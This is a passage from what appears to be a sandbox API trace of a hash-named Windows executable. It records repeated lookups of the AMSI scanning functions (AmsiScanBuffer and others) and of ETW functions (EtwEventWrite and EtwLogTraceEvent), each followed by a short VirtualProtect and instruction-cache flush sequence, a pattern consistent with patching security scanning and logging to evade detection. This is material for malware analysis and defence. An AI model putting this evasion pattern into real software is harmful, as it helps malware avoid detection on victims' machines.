dwSize=0x5) returned 1 [0102.443] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.444] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.445] VirtualProtect (in: lpAddress=0x2331000, dwSize=0x14304, flNewProtect=0x20, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x4) returned 1 [0102.448] SetErrorMode (uMode=0x8000) returned 0x0 [0102.448] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.451] SetErrorMode (uMode=0x0) returned 0x8000 [0102.452] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.452] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0102.452] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.493] GetCurrentProcess () returned 0xffffffff [0102.493] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.493] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.493] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.495] SetErrorMode (uMode=0x8000) returned 0x0 [0102.496] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.548] SetErrorMode (uMode=0x0) returned 0x8000 [0102.549] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.549] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0102.549] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.596] GetCurrentProcess () returned 0xffffffff [0102.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.596] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.596] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.598] SetErrorMode (uMode=0x8000) returned 0x0 [0102.598] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.602] SetErrorMode (uMode=0x0) returned 0x8000 [0102.602] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.602] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0102.602] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.641] GetCurrentProcess () returned 0xffffffff [0102.641] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.641] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.641] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.643] SetErrorMode (uMode=0x8000) returned 0x0 [0102.643] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.647] SetErrorMode (uMode=0x0) returned 0x8000 [0102.647] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.648] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0102.648] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.691] GetCurrentProcess () returned 0xffffffff [0102.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.691] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.692] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.693] VirtualProtect (in: lpAddress=0x2346000, dwSize=0x5b8, flNewProtect=0x80, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x1) returned 0 [0102.695] SetErrorMode (uMode=0x8000) returned 0x0 [0102.695] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.699] SetErrorMode (uMode=0x0) returned 0x8000 [0102.699] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.699] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0102.699] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.864] GetCurrentProcess () returned 0xffffffff [0102.864] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.864] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.864] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.866] SetErrorMode (uMode=0x8000) returned 0x0 [0102.866] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.870] SetErrorMode (uMode=0x0) returned 0x8000 [0102.870] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.871] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0102.871] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.918] GetCurrentProcess () returned 0xffffffff [0102.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.918] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.918] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.920] SetErrorMode (uMode=0x8000) returned 0x0 [0102.920] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.923] SetErrorMode (uMode=0x0) returned 0x8000 [0102.923] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.924] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0102.924] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0102.959] GetCurrentProcess () returned 0xffffffff [0102.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0102.959] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0102.959] FreeLibrary (hLibModule=0x6f870000) returned 1 [0102.960] SetErrorMode (uMode=0x8000) returned 0x0 [0102.960] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0102.966] SetErrorMode (uMode=0x0) returned 0x8000 [0102.966] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0102.967] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0102.967] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.008] GetCurrentProcess () returned 0xffffffff [0103.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.008] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.009] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.010] VirtualProtect (in: lpAddress=0x2347000, dwSize=0x1091, flNewProtect=0x80, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x1) returned 0 [0103.011] SetErrorMode (uMode=0x8000) returned 0x0 [0103.011] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.016] SetErrorMode (uMode=0x0) returned 0x8000 [0103.016] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.016] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0103.016] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.059] GetCurrentProcess () returned 0xffffffff [0103.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.059] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.059] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.061] SetErrorMode (uMode=0x8000) returned 0x0 [0103.061] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.067] SetErrorMode (uMode=0x0) returned 0x8000 [0103.067] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.068] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0103.068] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.113] GetCurrentProcess () returned 0xffffffff [0103.113] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.113] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.113] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.114] SetErrorMode (uMode=0x8000) returned 0x0 [0103.114] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.118] SetErrorMode (uMode=0x0) returned 0x8000 [0103.118] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.118] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0103.118] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.181] GetCurrentProcess () returned 0xffffffff [0103.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.181] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.182] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.183] SetErrorMode (uMode=0x8000) returned 0x0 [0103.183] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.187] SetErrorMode (uMode=0x0) returned 0x8000 [0103.188] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.188] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0103.188] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.228] GetCurrentProcess () returned 0xffffffff [0103.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.228] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.228] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.229] VirtualProtect (in: lpAddress=0x2349000, dwSize=0xc94, flNewProtect=0x80, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x1) returned 0 [0103.230] SetErrorMode (uMode=0x8000) returned 0x0 [0103.231] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.235] SetErrorMode (uMode=0x0) returned 0x8000 [0103.235] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.235] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0103.235] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.280] GetCurrentProcess () returned 0xffffffff [0103.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.280] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.280] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.282] SetErrorMode (uMode=0x8000) returned 0x0 [0103.282] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.287] SetErrorMode (uMode=0x0) returned 0x8000 [0103.287] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.288] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0103.288] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.339] GetCurrentProcess () returned 0xffffffff [0103.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.339] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.339] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.340] SetErrorMode (uMode=0x8000) returned 0x0 [0103.341] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.413] SetErrorMode (uMode=0x0) returned 0x8000 [0103.413] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.413] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0103.413] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.489] GetCurrentProcess () returned 0xffffffff [0103.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.489] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.490] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.491] SetErrorMode (uMode=0x8000) returned 0x0 [0103.491] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.495] SetErrorMode (uMode=0x0) returned 0x8000 [0103.496] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.496] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0103.496] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.551] GetCurrentProcess () returned 0xffffffff [0103.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.551] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.551] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.552] VirtualProtect (in: lpAddress=0x234a000, dwSize=0x19b8, flNewProtect=0x80, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x1) returned 0 [0103.554] SetErrorMode (uMode=0x8000) returned 0x0 [0103.554] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.558] SetErrorMode (uMode=0x0) returned 0x8000 [0103.559] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.559] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0103.559] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.634] GetCurrentProcess () returned 0xffffffff [0103.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.634] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.634] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.636] SetErrorMode (uMode=0x8000) returned 0x0 [0103.636] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.644] SetErrorMode (uMode=0x0) returned 0x8000 [0103.644] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.644] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0103.644] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.788] GetCurrentProcess () returned 0xffffffff [0103.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.788] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.788] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.790] SetErrorMode (uMode=0x8000) returned 0x0 [0103.790] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.795] SetErrorMode (uMode=0x0) returned 0x8000 [0103.795] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.795] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0103.795] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.796] GetCurrentProcess () returned 0xffffffff [0103.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.796] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.796] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.797] SetErrorMode (uMode=0x8000) returned 0x0 [0103.798] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.801] SetErrorMode (uMode=0x0) returned 0x8000 [0103.802] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.802] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0103.802] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.802] GetCurrentProcess () returned 0xffffffff [0103.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.802] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.802] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.804] VirtualProtect (in: lpAddress=0x234c000, dwSize=0x8bd, flNewProtect=0x80, lpflOldProtect=0x19fbe0 | out: lpflOldProtect=0x19fbe0*=0x1) returned 0 [0103.805] SetErrorMode (uMode=0x8000) returned 0x0 [0103.805] LoadLibraryA (lpLibFileName="System") returned 0x0 [0103.807] SetErrorMode (uMode=0x0) returned 0x8000 [0103.807] SetErrorMode (uMode=0x8000) returned 0x0 [0103.807] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0103.807] SetErrorMode (uMode=0x0) returned 0x8000 [0103.807] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0103.807] GetProcAddress (hModule=0x771d0000, lpProcName="NtQueryInformationThread") returned 0x77246ef0 [0103.807] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.808] GetCurrentProcess () returned 0xffffffff [0103.808] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.808] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.808] FreeLibrary (hLibModule=0x771d0000) returned 1 [0103.808] SetErrorMode (uMode=0x8000) returned 0x0 [0103.808] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0103.808] SetErrorMode (uMode=0x0) returned 0x8000 [0103.808] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0103.809] GetProcAddress (hModule=0x76600000, lpProcName="SystemFunction035") returned 0x71205db0 [0103.939] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.939] GetCurrentProcess () returned 0xffffffff [0103.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.940] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.940] FreeLibrary (hLibModule=0x76600000) returned 1 [0103.940] SetErrorMode (uMode=0x8000) returned 0x0 [0103.940] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0103.940] SetErrorMode (uMode=0x0) returned 0x8000 [0103.940] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0103.941] GetProcAddress (hModule=0x771d0000, lpProcName="EtwLogTraceEvent") returned 0x77245a10 [0103.941] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.941] GetCurrentProcess () returned 0xffffffff [0103.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.941] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.941] FreeLibrary (hLibModule=0x771d0000) returned 1 [0103.941] SetErrorMode (uMode=0x8000) returned 0x0 [0103.941] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0103.942] SetErrorMode (uMode=0x0) returned 0x8000 [0103.942] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0103.942] GetProcAddress (hModule=0x771d0000, lpProcName="NtOpenFile") returned 0x77246fd0 [0103.942] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.942] GetCurrentProcess () returned 0xffffffff [0103.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.943] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.943] FreeLibrary (hLibModule=0x771d0000) returned 1 [0103.943] SetErrorMode (uMode=0x8000) returned 0x0 [0103.943] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0103.943] SetErrorMode (uMode=0x0) returned 0x8000 [0103.943] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0103.944] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWrite") returned 0x7722ae80 [0103.944] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.944] GetCurrentProcess () returned 0xffffffff [0103.944] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.944] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.944] FreeLibrary (hLibModule=0x771d0000) returned 1 [0103.944] SetErrorMode (uMode=0x8000) returned 0x0 [0103.944] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.947] SetErrorMode (uMode=0x0) returned 0x8000 [0103.948] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.948] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0103.948] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.948] GetCurrentProcess () returned 0xffffffff [0103.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.948] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.948] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.949] SetErrorMode (uMode=0x8000) returned 0x0 [0103.949] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.953] SetErrorMode (uMode=0x0) returned 0x8000 [0103.953] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.953] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0103.953] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.953] GetCurrentProcess () returned 0xffffffff [0103.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.953] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.953] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.954] SetErrorMode (uMode=0x8000) returned 0x0 [0103.955] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0103.958] SetErrorMode (uMode=0x0) returned 0x8000 [0103.958] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0103.958] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0103.958] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0103.958] GetCurrentProcess () returned 0xffffffff [0103.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0103.958] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0103.958] FreeLibrary (hLibModule=0x6f870000) returned 1 [0103.962] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x670428 [0103.963] GetKeyboardType (nTypeFlag=0) returned 7 [0103.963] GetKeyboardType (nTypeFlag=1) returned 0 [0103.963] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe\" " [0103.963] GetStartupInfoA (in: lpStartupInfo=0x19f898 | out: lpStartupInfo=0x19f898*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, 